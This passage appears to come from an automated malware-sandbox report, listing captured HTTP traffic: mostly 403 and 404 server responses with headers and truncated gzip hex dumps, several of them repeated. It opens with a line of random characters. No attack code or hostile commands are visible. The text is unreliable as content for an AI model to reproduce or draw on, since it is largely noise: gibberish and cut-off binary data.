:iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundset-cookie: PHPSESSID=hg0s2enuefjtdt9jcr0vlbien2; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachecontent-type: text/html; charset=utf-8content-encoding: gzipvary: Accept-Encodingcontent-length: 19237date: Thu, 21 Dec 2023 04:03:28 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 4b 93 1b 47 96 26 ba 26 cd e6 3f 78 41 56 56 92 4d 46 26 02 cf 4c 8a cc 1a 8a d4 ab 54 a4 68 22 8b 66 53 0f 83 39 22 1c 40 24 e2 81 8a 07 48 a4 46 8b 7b 57 bd a8 9a d9 cf aa d3 ac b5 90 d9 68 55 bd 92 99 b4 68 30 ff c8 fd 25 f7 1c 77 8f 08 8f 08 c7 23 c9 0c 76 74 0f a0 2a 26 e0 8f 73 dc 3f 3f 7e fc 1c 7f de ff 95 1d 58 f1 6a c1 c8 2c f6 dc f3 bb f7 f1 0f 71 a9 3f 7d d0 8a e6 ad f3 bb 77 09 b9 3f 63 d4 3e bf 7b e7 ee 1d 42 f0 a7 c7 62 4a ac 19 0d 23 16 3f 68 25 f1 c4 38 c5 84 59 d4 2c 8e 17 06 fb 6b e2 2c 1f b4 5e 1b 09 35 ac c0 5b d0 d8 19 bb ac 45 ac c0 8f 99 0f f9 1c f6 80 d9 53 c6 73 62 d6 d8 89 5d 76 fe 68 b6 1a 53 d2 6b f7 ee 9f 88 80 8c aa 4f 3d f6 a0 65 b3 c8 0a 9d 45 ec 04 be 42 eb c5 fa a7 38 20 51 1c ae af fc 79 42 7c 87 91 0b 46 bc e0 fa 17 7f fd 03 f1 d7 57 17 d1 f5 f7 ad 32 ad 39 5b bd 0a 42 3b 52 08 f1 34 f8 91 7f f2 0f 04 dc bd 7b ff 57 86 11 c5 64 cc a6 8e 4f 0c 83 a3 53 a4 b9 74 d8 ab 45 10 c6 0a cd 57 8e 1d cf 1e d8 6c e9 58 cc e0 3f 8e 88 47 5f 3b 5e e2 19 91 45 5d f6 c0 3c 22 8e ef c4 0e 75 d3 80 e3 76 8b 9c 9c 67 0c 99 6f a7 ec ee bb 8e 3f 27 21 73 01 41 0b 41 c0 c6 83 ef 1e 9d b2 93 a5 6f 1f 7b 8e 15 06 51 30 89 8f 45 fc 2c 64 93 07 2d 6c 93 7b 27 27 17 d4 b7 e6 89 eb cc 8f a3 f9 89 e3 4d 4f 26 74 89 c9 30 ed 6f cd c1 b0 dd 3e eb f5 fb 5d 01 55 ce 29 9a 41 95 ac 24 26 55 96 af 8d 77 65 53 c6 94 43 9a f3 a6 8b 85 cb 8c 38 48 ac 99 64 15 39 97 2c 7a d0 32 4f db af e1 ff 2a eb a8 cc 3b 59 b8 01 b5 4f a2 38 9e 31 8f 31 db 89 83 f0 c4 1c 4c 7a c3 d3 f6 e4 74 7c 3a 9c 74 da 36 1b f6 7a bd 76 7b dc ee 8e ad 71 bb df 3d 5e f8 53 5e ca 4e a7 0f c5 e4 2d 21 84 60 2b f8 90 2b 2f db e0 b5 39 b8 79 c9 fa 67 6c 68 77 fa 6d da ee 9d 8e bb 66 7b 30 18 0f ac 7e e7 f4 ac 4f 4f 3b 9d 21 bd 85 92 75 3b af bb 9d 9b 97 ec 8c 5a 66 c7 1c 5a a7 80 db 70 38 9e 74 c6 74 02 ff 42 d9 3a 13 73 dc 6f ef 55 32 8f fa ce 84 45 71 ca 7e 43 f3 9c 44 4e cc 8e 5f b1 71 9a 5e 25 ac 25 1b cd 2b 52 b8 5f b5 3a 7d c6 4e c7 e6 29 54 a9 7f 36 66 43 36 19 8f fb bd 5e bf dd ed 58 a6 45 fb c7 d1 b2 58 2d 2b 70 83 f0 41 eb 03 d6 ef d9 9d 41 5e 1a 45 05 78 11 8a ac 63 51 54 52 a0 fb fc 89 33 55 d4 c1 0d e4 f4 64 1c 06 af 22 16 0a 1a c7 af 3d b7 8a 84 46 45 14 bb 6e bc 72 59 34 63 2c 2e a3 33 81 12 45 c7 d3 20 98 ba 8c 2e 9c e8 18 d4 f4 89 15 45 bf 9d 50 cf 71 57 0f 5e 06 ae 3b 0f 42 ff 5e c8 a6 89 4b c3 16 f1 a0 60 14 7a a4 eb 56 14 84 96 4b b9 96 bc 72 d1 49 1c 52 3f 9a 04 a1 c7 c2 13 1a c1 20 12 9d 58 d4 9a 31 11 6f 74 a9 6d 9f 4d 40 f8 8f a1 30 25 a6 e2 83 aa 18 d8 8b 91 40 4a 7a cc 5e c7 c0 6d 49 45 68 d6 32 84 2c 69 48 80 64 1c 58 34 8c 47 20 52 1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00 Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00 Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 b6 45 e3 db 4b e1 e2 71 76 e6 9b 59 ba 4b af 09 bf d7 19 9c f9 a5 84 ba 39 95 45 02 c1 1e b1 c8 78 8e 98 f2 74 73 8e 61 84 98 55 01 23 54 b9 a1 67 54 c9 56 2c c2 75 ae 97 2c 8e 62 a8 b4 83 5c cf a3 a0 b8 1d 09 c5 35 44 1f 5a 7c 3d 77 60 7f 99 45 11 3a 31 ae 24 18 f9 9a a5 75 52 40 73 2b 01 5b 31 74 63 67 9d 69 9d 36 08 9f d6 c2 b8 70 4f cf 81 1e c1 a9 ce 82 95 e6 2d 4d 48 71 f2 3b eb c2 d2 e9 3f 23 3f 1d 55 df e9 d4 00 00 00 Data Ascii: M0},MI)(EKqvYK9ExtsaU#TgTV,u,b\5DZ|=w`E:1$uR@s+[1tcgi6pO-MHq;?#?U
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00 Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00 Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00 Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00 Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00 Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:29 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 592content-encoding: gzipData Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 55 60 d8 46 25 5b 87 e5 2b b2 d1 ed ee 16 cd 43 d1 62 93 7d 68 8b 3e 50 12 65 b3 a1 44 95 a2 e3 78 8b fd ef 1d 4a f2 a5 38 0e 62 14 a5 ad 83 9c e1 c7 e1 5c 1c 05 ef 62 11 a9 4d 4e 61 a9 52 3e bf 0a f4 03 38 c9 16 33 83 66 c6 fc 0a 47 28 89 e7 57 80 2d 48 a9 22 10 2d 89 2c a8 9a 19 2b 95 58 63 e3 90 94 91 94 ce 8c 47 46 d7 b9 90 ca 80 48 64 8a 66 c8 ba 66 b1 5a ce 62 fa c8 22 6a 95 1d 13 58 c6 14 23 dc 2a 22 c2 e9 cc 31 a1 58 4a 96 3d 58 4a 58 09 53 b3 4c 9c 80 96 22 14 aa 38 00 ce 04 cb 62 fa 64 42 26 12 c1 b9 58 eb 37 22 a3 25 7b a4 db f9 8a 29 4e e7 9f a4 14 12 06 b6 17 f4 ab 81 8a 58 a8 cd f6 5d 37 bd 7d 73 d7 0b 45 bc 81 7f 76 dd 92 81 b2 c5 52 4d c1 b1 ed d6 cd 11 a5 dc d6 29 42 4a e4 82 65 53 b0 8f 87 73 12 c7 2c 5b 1c 8d 7f db bd 9d 93 21 c1 dd 5b 09 49 19 df 4c c1 22 79 ce a9 55 6c 0a 45 53 13 7e e0 a8 c3 9f 49 74 57 f6 7f 44 4e 13 8c 3b ba 10 14 be dc 1a 26 7c d6 1a 14 26 fc 44 f9 23 55 2c 22 26 bc 97 68 06 54 3f c9 0a ab a0 92 25 38 e3 bd 06 85 0f 82 a3 ce 3e a5 e2 2f 66 1c c0 9c 18 b9 db a4 a1 e0 c6 f1 0e 43 12 3d 2c a4 58 65 b1 15 69 a4 29 2c 0b 4e 3a b6 09 76 cb 2c 15 85 f7 ee 8b 73 58 4a 16 74 0a 92 c4 da 4d 16 fa 89 36 ef 10 05 8e d7 82 c9 04 67 97 78 ae 3f 3e 46 04 3b 47 8f 50 12 37 94 13 89 73 c0 b7 5b 5d f3 14 d2 c8 45 a4 e1 16 c9 73 2f 06 1a 8f 5a 30 f4 b6 40 8e 7b 39 d2 60 d2 02 df df 23 0d 2f 46 f2 9d 16 38 83 9d 9a ec cb 65 d2 0a df 89 e4 0e 2e 07 f2 50 4d ee 68 af 6f 6f 8b 32 70 de 0a e5 e0 ee bc 9d e9 5c d7 37 61 a4 0d e0 ba 6f 45 1a fb 2d 18 8c ff 13 a1 c6 83 96 de e3 db 84 6a e4 05 51 60 62 14 98 30 24 e5 44 61 22 3b 9b 1f 96 4e 23 3b 58 6b 1a 3e 30 65 1d 46 1f 67 f9 14 14 7d 52 37 27 59 35 05 93 2e e7 db 38 3d 90 f0 e5 90 7e 01 f4 22 b0 3a d6 31 79 51 22 f7 1a 45 c7 f3 63 ba 30 e1 3a f6 6c 7b 8c 7e 77 6d 27 ee 60 e8 35 75 56 e5 52 3c 3b 50 24 bb e7 d3 f4 ac ce ae f5 f9 41 70 2d d9 d0 5d 9d c3 3d fb 10 40 b7 5d 0e 07 b2 52 a2 b1 0d f1 64 15 4b 12 8b 35 9a 6c 11 ea 84 84 66 df df ec 5e 65 78 70 ea 4b bf b3 0c cf 50 b3 e2 f7 31 23 ea 6b e2 69 66 d7 af b8 fd 72 8a ad ef 96 5b fa 4d c9 ac b3 67 f5 ef 79 15 a3 a7 6f c3 92 4f bf be a4 e3 29 5c 27 49 72 da 01 42 21 63 2a 2d ad f6 55 31 05 bf 89 62 a5 e2 eb ab 4c af d1 f7 8e 4d c2 42 f0 95 a2 c7 f4 d2 78 7e f3 f4 e4 34 51 27 86 4b a7 4a 84 4c 6b ff c2 48 a1 1d cb d7 51 6b 3d 8f a9 d2 27 09 67 0b 5c 3c 42 c7 a2 f2 ac 7f 7c 9f 52 8c 6c 10 19 df 40 11 49 4a 33 20 59 0c 9d 94 3c 59 b5 8b 0c b4 61 ba 0d f7 79 d1 af 74 ab 27 8e ed d6 11 e9 db 45 82 b0 6c 2f 88 a3 05 69 ca 37 19 fe 1f f2 5d c7 58 9b 31 5e 34 e0 ea c0 bf 9e 24 fa 77 6c 8a b2 78 29 d8 57 aa 03 75 dc 8c b3 5d 51 e4 d0 b4 bc dc ea 79 d6 5c 91 88 e9 a9 12 a9 5
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:29 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 592content-encoding: gzipData Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 eb 6f db 36 10 ff 9e bf e2 ea c0 70 82 49 b6 1e 96 63 bb b2 b1 ae ed b0 7c 18 36 34 e9 87 6d d8 07 4a 3a d9 5c 28 51 a3 e8 38 ee d0 ff 7d 47 49 7e a9 4e 8a 1a c3 68 eb 41 de f1 c7 e3 bd 78 0a 5f 25 32 d6 9b 02 61 a9 33 31 bf 08 cd 03 04 cb 17 b3 0e e6 9d f9 05 8d 20 4b e6 17 40 2d cc 50 33 88 97 4c 95 a8 67 9d 95 4e ed 71 e7 90 94 b3 0c 67 9d 47 8e eb 42 2a dd 81 58 e6 1a 73 62 5d f3 44 2f 67 09 3e f2 18 ed aa 63 01 cf b9 e6 4c d8 65 cc 04 ce 5c 0b ca a5 e2 f9 83 ad a5 9d 72 3d cb e5 09 68 25 23 a9 cb 03 e0 5c f2 3c c1 27 0b 72 99 4a 21 e4 da bc 31 15 2f f9 23 6e e7 6b ae 05 ce df 2b 25 15 0c 1d 3f 1c d4 03 35 b1 d4 9b ed bb 69 66 fb d6 ae 17 c9 64 03 ff ec ba 15 03 f2 c5 52 4f c1 75 9c ee eb 23 4a b5 ad 53 84 8c a9 05 cf a7 e0 1c 0f 17 2c 49 78 be 38 1a ff bc 7b 7b 49 86 94 76 6f a7 2c e3 62 33 05 9b 15 85 40 bb dc 94 1a 33 0b 7e 10 a4 c3 9f 59 7c 57 f5 7f 24 4e 0b 3a 77 b8 90 08 1f 6f 3b 16 7c 30 1a 94 16 fc 84 e2 11 35 8f 99 05 6f 14 99 81 d4 cf f2 d2 2e 51 f1 94 66 bc 31 a0 f0 56 0a d2 d9 fb 4c fe c5 3b 07 30 27 46 ee 36 59 24 45 e7 78 87 11 8b 1f 16 4a ae f2 c4 8e 0d d2 14 96 a5 60 57 8e 05 4e d7 aa 14 45 f7 eb 67 e7 f0 8c 2d 70 0a 8a 25 c6 4d 16 e6 49 36 bf 62 1a 5c bf 0b 93 09 cd ae f0 bc 60 7c 8c 08 4e 41 1e a1 15 6d a8 60 8a e6 40 e0 74 af ad 53 48 37 1e 21 8d b6 48 be 77 36 d0 f8 a6 0b 23 7f 0b e4 7a e7 23 0d 27 5d 08 82 3d d2 e8 6c a4 c0 ed 82 3b dc a9 c9 39 5f 26 a3 f0 9d 48 de f0 7c 20 9f d4 e4 dd ec f5 ed 6f 51 86 ee b7 42 b9 b4 3b 7f 67 3a cf 0b 2c b8 31 06 f0 bc 6f 45 1a 07 5d 18 8e ff 13 a1 c6 c3 ae d9 e3 b7 09 d5 ca 0b b2 a4 c4 28 29 61 28 14 4c 53 22 7b 31 3f 2c dd 56 76 b0 d7 18 3d 70 6d 1f 46 9f e0 c5 14 34 3e e9 d7 27 59 0d 85 92 ae 10 db 38 3d 90 f0 f9 90 7e 06 f4 2c b0 26 d6 29 79 21 53 7b 8d 92 e3 05 09 2e 2c b8 4c 7c c7 19 93 df 5d 3a a9 37 1c f9 6d 9d d5 b9 94 ce 0e 12 c9 e9 07 98 bd a8 b3 4b 73 7e 30 5a 4b b5 74 d7 e4 70 df 39 04 30 6d 97 c3 81 ad b4 6c 6d 43 3e d9 e5 92 25 72 4d 26 5b 44 26 21 91 d9 f7 37 a7 5f 1b 1e dc e6 32 ef 3c a7 33 d4 aa f9 03 ca 88 e6 9a f8 86 d9 0b 6a ee a0 9a e2 98 bb ed 55 7e 53 31 9b ec 59 ff fb 7e cd e8 9b db a8 e2 33 af cf e9 78 0a 97 69 9a 9e 76 80 48 aa 04 95 6d d4 be 2a a7 10 b4 51 ec 4c 7e fa 2a d3 d7 e8 7b c7 66 51 29 c5 4a e3 31 bd 32 5e d0 3e 3d 05 a6 fa c4 70 e5 54 a9 54 59 e3 5f 14 29 78 65 07 26 6a ed 2f 63 aa f2 49 26 f8 82 16 8f c9 b1 50 bd e8 1f df 67 48 91 0d 32 17 1b 28 63 85 98 03 cb 13 b8 ca d8 93 dd b8 c8 d0 18 e6 ba e5 3e cf fa 95 69 cd c4 b1 d3 3d 22 7d 3e 4b 10 9e ef 05 71 8d 20 6d f9 26 a3 ff 43 be cb 84 6a 33 2e ca 16 5c 13 f8 97 93 d4 fc 8e 4d 51 15 2f 25 ff 84 26 50 c7 ed 38 db 15 45 2e 66 d5 e5 d5 cf 17 cd 15 cb 04 4f 95 48 f
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 191Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 39 0e c2 30 10 45 7b 9f 62 48 4f 26 20 4a cb 05 24 88 48 61 11 32 05 65 90 07 d9 12 b1 83 ed b0 dc 1e 07 1a ca bf cc fb c3 27 e5 7e 25 cf 87 0a 36 72 db c0 e1 b4 6c ea 15 64 53 c4 ba 92 6b c4 52 96 bf 64 9e 17 88 d5 2e 13 8c eb d8 dd 04 d7 d4 aa 24 a2 89 37 12 8b 62 01 3b 17 61 ed 06 ab 38 fe 4c c6 f1 5b e2 17 a7 de e3 dd 4c fc 75 92 62 bc 17 52 13 78 ba 0f 14 22 29 38 1d 1b c0 56 75 c6 9a 10 7d 1b 9d 47 63 15 bd f2 5e f7 f0 6c 03 d8 04 b8 8e 00 70 16 a2 36 01 02 f9 07 f9 9c 63 3f 0e 7e a7 12 7c 7c 91 7d 00 cc 66 b7 ab dd 00 00 00 Data Ascii: M90E{bHO& J$Ha2e'~%6rldSkRd.$7b;a8L[LubRx")8Vu}Gc^lp6c?~||}f
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 194Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00 Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:29 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 194Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00 Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:30 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 591content-encoding: gzipData Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 5b 73 e2 36 14 7e cf af 38 eb 0c 03 4c 6d f0 05 83 21 86 e9 76 77 3b cd 43 a7 9d 4d f6 a1 ed f4 41 d8 32 a8 91 2d 57 16 21 6c 67 ff 7b 8f 6c 73 73 08 99 30 9d 0a 7c 91 ce d1 a7 a3 73 d3 71 f8 2e 16 91 da e4 14 96 2a e5 b3 ab 50 3f 80 93 6c 31 35 68 66 cc ae 70 84 92 78 76 05 d8 c2 94 2a 02 d1 92 c8 82 aa a9 b1 52 89 15 18 87 a4 8c a4 74 6a 3c 32 ba ce 85 54 06 44 22 53 34 43 d6 35 8b d5 72 1a d3 47 16 51 ab ec 98 c0 32 a6 18 e1 56 11 11 4e a7 8e 09 c5 52 b2 ec c1 52 c2 4a 98 9a 66 